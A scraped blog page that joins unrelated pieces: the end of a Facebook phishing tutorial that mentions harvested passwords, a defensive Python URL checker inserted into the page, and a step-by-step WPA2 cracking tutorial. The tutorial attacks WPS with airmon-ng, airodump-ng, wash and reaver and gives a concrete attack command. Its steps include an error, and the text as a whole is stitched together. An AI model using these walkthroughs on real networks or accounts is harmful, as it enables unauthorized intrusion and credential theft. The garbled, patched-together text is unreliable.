5. If someone logs in, we can view the harvested passwords on the view.php page.

Update!!:


Countermeasure:

1. Look carefully at the URL in the browser address bar; do not continue browsing if you find the URI is mistyped. Only facebook.com is the real one.
2. If you type your username and password correctly but the Facebook page redirects you to a wrong username or password error page, check the browser address bar URL in case you have opened a fake Facebook page.
Hope you found it useful :-)
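Countermeasure 1 above amounts to checking that the host in the address bar really is facebook.com. As an added example (not from the post), the Python check below applies that test the way a browser parses a URL, so a domain used as a prefix, a user@host trick, a look-alike spelling and a plain-http copy all fail while a real subdomain or explicit port passes. The URLs in SAMPLE_URLS are constructed look-alikes.

```python
"""Decide whether a login URL really belongs to facebook.com.

Only https URLs whose host is exactly the domain or a subdomain of it pass.
SAMPLE_URLS are constructed examples of the mistakes the check must catch.
"""
from urllib.parse import urlsplit

LEGIT_DOMAIN = "facebook.com"

SAMPLE_URLS = [
    "https://www.facebook.com/login.php",
    "http://www.facebook.com/login.php",                       # right host, clear text
    "https://facebook.com.login-check.example/",               # domain as a prefix only
    "https://www.facebook.com@login-check.example/login.php",  # userinfo trick
    "https://faceb00k.com/login.php",                          # digit-zero look-alike
    "https://www.facebook.com:8443/",                          # explicit port, still facebook.com
]


def host_of(url):
    """Return the lowercase host a browser would connect to, or None if unusable.

    urlsplit already discards user:pass@ and :port, so only the real host is
    compared, not whatever text appears before the '@'.
    """
    parts = urlsplit(url.strip())
    if parts.scheme.lower() not in ("http", "https"):
        return None
    host = parts.hostname
    return host.rstrip(".") if host else None


def is_legit(url, domain=LEGIT_DOMAIN):
    """True only for https URLs on domain itself or a subdomain ('.' + domain suffix)."""
    parts = urlsplit(url.strip())
    host = host_of(url)
    if host is None or parts.scheme.lower() != "https":
        return False
    return host == domain or host.endswith("." + domain)


def classify(urls, domain=LEGIT_DOMAIN):
    """Return [(url, verdict)] for a batch of URLs."""
    return [(url, is_legit(url, domain)) for url in urls]


if __name__ == "__main__":
    for url, verdict in classify(SAMPLE_URLS):
        print("%-58s %s" % (url, "OK" if verdict else "NOT facebook.com"))
```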

5 Steps Wifi Hacking – Cracking WPA2 Password

After the long holiday, first I want to say Merry Christmas and Happy New Year 2014 to you. Today we will learn about 5 Steps Wifi Hacking – Cracking WPA2 Password. A lot of readers sent many requests regarding how to crack wireless WPA2 passwords on our request tutorial page.
According to Wikipedia :
Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are two security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks. The Alliance defined these in response to serious weaknesses researchers had found in the previous system, WEP (Wired Equivalent Privacy)
A flaw in a feature added to Wi-Fi, called Wi-Fi Protected Setup (WPS), allows WPA and WPA2 security to be bypassed and effectively broken in many situations. Many access points have Wi-Fi Protected Setup enabled by default (even after we hard reset the access point).
Requirements:

1. Wireless card (support promiscuous mode)
In this tutorial I use ALFA AWUS036H from Amazon.

2. Access point with WPA2 and WPS enabled


5 Steps Wifi Hacking – Cracking WPA2 Password:

1. Open our terminal (CTRL+ALT+T) and type airmon-ng. This command will list the wireless cards attached to our system.

2. The next step is to stop our wireless monitor mode by running airmon-ng stop wlan0

3. Now we are ready to capture the wireless traffic around us. By running airodump-ng wlan0, our wireless interface will start capturing the data.

From the picture above, we can see many available access points with all their information. In the green box is our victim access point, which is my own access point :-)

Information:
BSSID (Basic Service Set Identification): the MAC address of access point
PWR: Signal level reported by the card.
Beacons: Number of announcement packets sent by the AP
#Data: Number of captured data packets (if WEP, unique IV count), including data broadcast packets.
#/s: Number of data packets per second measured over the last 10 seconds.
CH: Channel number (taken from beacon packets).
MB: Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g.
ENC: Encryption algorithm in use.
CIPHER: The cipher detected. TKIP is typically used with WPA and CCMP is typically used with WPA2.
AUTH: The authentication protocol used.
ESSID: Shows the wireless network name. The so-called “SSID”, which can be empty if SSID hiding is activated.

4. From step 3 above, we can find an access point with encryption algorithm WPA2 and note the AP channel number. Now we will find out whether the target AP has WPS enabled or not.
wash -i wlan0 -c 8 -C -s

If the WPS Locked status is No, then we are ready to crack and move to step 5.

5. The last step is cracking the WPA2 password using reaver.
reaver -i <your_interface> -b <wi-fi victim MAC address> --fail-wait=360
Because we already have the information from step 3 above, my command looks like this:
reaver -i wlan0 -b E0:05:C5:5A:26:94 --fail-wait=360


It took about 5 hours to crack the 19-character WPA2 password (vishnuvalentino.com) from my Kali VirtualBox, but it depends on our hardware and wireless card.

Conclusions:
1. WPA and WPA2 security implemented without using the Wi-Fi Protected Setup (WPS) feature are unaffected by the security vulnerability.
2. To prevent this attack, just turn off the WPS/QSS feature on our access point. See the picture below (I only have the Chinese version :-P )

Notes: Only practice this tutorial in your own lab and on your own devices. Hacking can be a crime if you don’t know where to put it.